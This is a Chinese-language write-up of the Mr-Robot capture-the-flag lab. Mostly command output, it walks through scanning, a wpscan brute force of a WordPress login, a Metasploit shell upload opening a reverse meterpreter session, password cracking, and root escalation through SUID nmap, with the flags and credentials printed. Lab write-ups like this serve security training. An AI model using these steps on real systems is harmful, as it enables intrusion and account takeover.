[Write-up]Mr-Robot
关于
信息收集
- 用的是Host-only,所以网卡是vmnet1,IP一直是192.168.7.1/24
nmap -T4 192.168.7.1/24 -A
kali-team@LTS:~$ nmap -T4 192.168.7.1/24 -A
Nmap scan report for 192.168.7.129
Host is up (0.00075s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 47.44 seconds
kali-team@LTS:~$ curl http://192.168.7.129/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
- 发现第一个Key【073403c8a58a1f80d943455fb30724b9】,外加一个字典,下载字典到本地。
- 字典很大,可能有重复的,先优化一下。
sort fsocity.dic | uniq > list.dic nikto -h http://192.168.7.129
kali-team@LTS:~/桌面$ nikto -h http://192.168.7.129
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.7.129
+ Target Hostname: 192.168.7.129
+ Target Port: 80
+ Start Time: 2018-06-19 20:37:10 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ IP address found in the 'x-mod-pagespeed' header. The IP is "1.9.32.3".
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-mod-pagespeed' found, with contents: 1.9.32.3-4523
+ Retrieved x-powered-by header: PHP/5.5.29
+ Uncommon header 'x-pingback' found, with contents: http://192.168.7.129/xmlrpc.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /readme: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://192.168.7.129/?p=23>; rel=shortlink
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ 6544 items checked: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2018-06-19 20:39:38 (GMT8) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- 通过nikto简单扫描或者用dirsearch扫一下目录
kali-team@LTS:~/桌面$ dirsearch -u http://192.168.7.129 -e * |grep 200
[20:42:35] 301 - 235B - /admin -> http://192.168.7.129/admin/
[20:42:36] 200 - 1KB - /admin/
[20:42:36] 200 - 1KB - /admin/?/login
[20:42:38] 200 - 1KB - /admin/index
[20:42:38] 200 - 1KB - /admin/index.html
[20:42:41] 301 - 0B - /admin_area/index.php -> http://192.168.7.129/admin_area/
[20:43:15] 200 - 0B - /favicon.ico
[20:43:23] 200 - 1KB - /index.html
[20:43:25] 200 - 504KB - /intro
[20:43:28] 200 - 309B - /license.txt
[20:43:50] 200 - 64B - /readme
[20:43:50] 200 - 64B - /readme.html
[20:43:51] 200 - 41B - /robots.txt
[20:43:56] 200 - 0B - /sitemap
[20:43:56] 200 - 0B - /sitemap.xml
[20:43:56] 200 - 0B - /sitemap.xml.gz
[20:44:12] 200 - 0B - /wp-content/
[20:44:12] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[20:44:12] 200 - 3KB - /wp-login
[20:44:12] 200 - 3KB - /wp-login.php
[20:44:12] 200 - 3KB - /wp-login/
- 明显是一个WordPress,但是没有看到有用户发文章。打开登录页面枚举用户名,百度Mr.Robot发现黑客军团的主角叫
Elliot,现在他提示密码错误了,说明用户名是对的。然后用刚刚发现的字典爆破。 wpscan -u http://192.168.7.129 --username Elliot --wordlist list.dic
[+] Enumerating plugins from passive detection ...
[+] No plugins found passively
[+] Starting the password brute forcer
[+] [SUCCESS] Login : Elliot Password : ER28-0652
Brute Forcing 'Elliot' Time: 00:01:21 <============================================================= > (5637 / 11452) 49.22% ETA: 00:01:24
+----+--------+------+-----------+
| ID | Login | Name | Password |
+----+--------+------+-----------+
| | Elliot | | ER28-0652 |
+----+--------+------+-----------+
[+] Finished: Tue Jun 19 21:22:23 2018
[+] Elapsed time: 00:01:22
[+] Requests made: 5703
[+] Memory used: 32.516 MB
GetShell
- 第一种就是以前的登录改主题404模板
- 第二种要用到Metasploit,看自己喜欢。一个大坑!
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ER28-0652 yes The WordPress password to authenticate with
PAYLOAD_NAME Kali-Team yes Fix By Kali-Team payload_name to update with
PLUGIN_NAME WordPress yes Fix By Kali-Team plugin_name to update with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.7.129 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME Elliot yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.7.1 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
password => ER28-0652
msf exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
username => Elliot
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.7.129
rhost => 192.168.7.129
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.7.1:4444
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
报错了,Google修复,可以上传,但是反弹不会来插件的路径。
/opt/metasploit-framework/embedded/framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
用#注释掉下面两行
fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
再重新载入模块
msf exploit(unix/webapp/wp_admin_shell_upload) > reload
[*] Reloading module...
msf exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.7.1:7788
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/WordPress/Kali-Team.php...
[*] Sending stage (37775 bytes) to 192.168.7.129
[*] Meterpreter session 5 opened (192.168.7.1:7788 -> 192.168.7.129:36273) at 2018-06-19 23:13:10 +0800
ls
[!] This exploit may require manual cleanup of 'Kali-Team.php' on the target
[!] This exploit may require manual cleanup of 'WordPress.php' on the target
[!] This exploit may require manual cleanup of '../WordPress' on the target
提权
- 在robot用户的目录下找到了第二个Key,但是没权限查看。
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 15:28:21 +0800 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 15:28:21 +0800 password.raw-md5
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
- 把MD5破解出来,应该就是robot的密码了。
- 但是su在反弹回来的shell中执行不了。
su: must be run from a terminal - 转py可以进入交互模式
python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz
robot@linux:~$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
- 第二个Key找到了!
- 最后提升到root权限,找开启了SUID权限的应用
robot@linux:/$ cd /root
cd /root
bash: cd: /root: Permission denied
robot@linux:/$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
robot@linux:/$
- 低版本的nmap可以用交互模式,而且上面说的是root权限。!后面接着命令就可以了。
robot@linux:/$ nmap --help
nmap --help
Nmap 3.81 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR RPC scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: 1-1024,1080,6666,31337
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
robot@linux:/$
robot@linux:/$ nmap --interactive
nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
!id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap>
Unknown command (ls) -- press h <enter> for help
nmap/> !ls
!ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
waiting to reap child : No child processes
nmap> !ls /root
!ls /root
firstboot_done key-3-of-3.txt
waiting to reap child : No child processes
nmap> cat /root/key-3-of-3.txt
cat /root/key-3-of-3.txt
Unknown command (cat) -- press h <enter> for help
nmap> !cat /root/key-3-of-3.txt
!cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
waiting to reap child : No child processes
nmap>
彩蛋
- 其实账号密码别人已经给你了
http://192.168.7.129/license.txt - 拿到
ZWxsaW90OkVSMjgtMDY1Mgo= - base64解一下
echo ZWxsaW90OkVSMjgtMDY1Mgo= |base64 --decode - elliot:ER28-0652
[Write-up]Mr-Robot的更多相关文章
- metasploit渗透初探MR.robot(一)
看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstatio ...
- 10 Best TV Series Based On Hacking And Technology
Technology is rapidly becoming the key point in human lives. Here we have discussed top TV shows whi ...
- 开启属于你的GNOME桌面
图片剪辑源自美剧<黑客军团>(英语:Mr. Robot) GNOME(GNU Network ObjectEnvironment)是一种GNU网络对象模型环境 ,GNU计划的一部分,目的为 ...
- Hacking HackDay: Albania
概述: Name: HackDay: Albania Date release: 18 Nov 2016 Author: R-73eN Series: HackDay 下载: https://down ...
- Swift.Operator-and-Items-in-Swift(1)
Operator and Item 1. ..< a for-in loop and the half-open range operator (..<) // Check each pa ...
- ThinkPad T43续命记
// Description: 原作于2016年8月25日. Mr. Robot 最近有部叫<黑客军团>(Mr. Robot)的戏比较火.目前第二季已经出到一大半了,深得技术宅和技术宅仰慕 ...
- Hijacking FM Radio with a Raspberry Pi & Wire
转载:https://null-byte.wonderhowto.com/how-to/hack-radio-frequencies-hijacking-fm-radio-with-raspberry ...
- online QRcode generator , QRcode=== (Quick Response Code) , 二维条码,二维码,彩色二维码,图片二维码,
online QRcode generator , QRcode=== (Quick Response Code) , 二维条码,二维码,彩色二维码,图片二维码, 1 http://cli.i ...
- VR ( Virtual Reality )、AR(Augmented Reality)、MR(Mix Reality)和CR(Cinematic Reality)是什么鬼?
整个社会对虚拟现实的研究和开发源于上个世纪六十年代,计算机图形学.人机接口技术.图像处理与模式识别.多传感技术.语音处理与音响技术.高性能计算机系统.人工智能等领域在之后半个世纪取得了长足的发展为虚拟 ...
随机推荐
- 吴裕雄--天生自然神经网络与深度学习实战Python+Keras+TensorFlow:LSTM网络层详解及其应用
from keras.layers import LSTM model = Sequential() model.add(embedding_layer) model.add(LSTM(32)) #当 ...
- EVE磁盘扩容
1.登录到EVE 输入df -h查看一下/dev/mapper/eve--ng--vg-root这个文件目录,这里就是存放镜像的. 2.EVE关机编辑EVE虚拟机 如下图扩展目前的容量: 然后点击扩展 ...
- pandas read excel or csv
import pandas as pd """pandas doc:df.dtypes 查看数据每column 数据类型 id int64x0 float64df.rei ...
- JS-条件语句5准则
准则: 1.多重判断时使用 Array.includes 2.更少的嵌套,尽早 return 3.使用默认参数和解构 4.倾向于遍历对象而不是 Switch 语句 5.对 所有/部分 判断使用 Arr ...
- C++基础之字符串string
C++基础之字符串string 标准库类型string表示可变长的字符序列,使用string类型必须首先包含string头文件.作为标准裤的一部分,string定义在命名空间std中. 定义和初始化s ...
- cascadia-code 程序员友好字体
下载地址:https://github.com/microsoft/cascadia-code/releases/download/v1911.21/Cascadia.ttf 下载后右键点击下载的文件 ...
- 初探three.js几何体-Geometry
three.js几何体我们还没有说完,这一节我们说一说THREE.Geometry(),简单几何体都是继承了这个对象,使用它会相对麻烦一些,但是可操作性非常高,今天我们使用它制作一个自定义几何体-五角 ...
- Druid数据源SQL数据库与Spring监控
Druid监控概要说明 为什么要监控? Druid是什么?德鲁伊 URL监控配置说明 配置步骤 步骤 配置 第一步 web.xml 配置 WebStatFilter 第二步 WebStatFilter ...
- c语言中的qsort用法
1.首先了解 int cmp(const void* a, const void* b) 表示声明cmp函数,其返回值为int型,参数为两个不可修改(const)的void型指针 2.函数原型 函数声 ...
- CF908D 【New Year and Arbitrary Arrangement】
蒟蒻渣渣禹小心翼翼发布题解.... 这道题,嗯,期望,dp,好,我们有思路了.... however, 主要问题在于字符串无限延伸,so,我们需要考虑记录前缀的关键量来为DP设置终止状态. 我们不妨设 ...